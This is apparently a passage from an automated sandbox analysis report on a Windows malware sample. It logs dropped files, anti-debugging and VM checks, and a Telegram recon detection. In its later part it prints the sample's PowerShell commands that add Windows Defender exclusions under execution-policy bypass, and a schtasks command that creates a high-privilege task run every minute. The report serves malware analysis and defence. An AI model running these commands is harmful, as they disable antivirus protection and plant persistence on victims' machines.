Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594200s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594078s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -593968s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep count: 8641 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep count: 885 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3304	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6684	Thread sleep count: 5767 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep count: 1385 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968	Thread sleep count: 7545 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2624	Thread sleep count: 1648 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3108	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744	Thread sleep count: 7559 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744	Thread sleep count: 1982 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\Systen User TID: 6084	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\adawsfaefasfasfg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\wasdwasfwasfs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\adawsfaefasfasfg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Systen User	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599870	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599761	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599148	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597152	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596933	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596580	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596460	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595880	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595637	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594752	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594619	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594464	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594334	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599280	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599170	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598402	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597943	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596447	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594867	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594314	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594200	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Systen User	Thread delayed: delay time: 922337203685477

Source: Systen User.2.dr	Binary or memory string: vmware
Source: svchost.exe, 0000001F.00000002.2583747988.0000024CFE052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2579519323.0000024CFC82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: adawsfaefasfasfg.exe, 00000002.00000002.2631919617.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BDC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\adawsfaefasfasfg.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\adawsfaefasfasfg.exe

Code function: 2_2_00007FF887D27681 CheckRemoteDebuggerPresent,

2_2_00007FF887D27681

Source: C:\Users\user\adawsfaefasfasfg.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\adawsfaefasfasfg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Systen User	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\adawsfaefasfasfg.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\adawsfaefasfasfg.exe "C:\Users\user\adawsfaefasfasfg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Users\user\wasdwasfwasfs.exe "C:\Users\user\wasdwasfwasfs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" "	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User'	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe'	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where curl	Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match	File source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Queries volume information: C:\Users\user\Desktop\ozgpPwVAu1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Queries volume information: C:\Users\user\adawsfaefasfasfg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Queries volume information: C:\Users\user\wasdwasfwasfs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
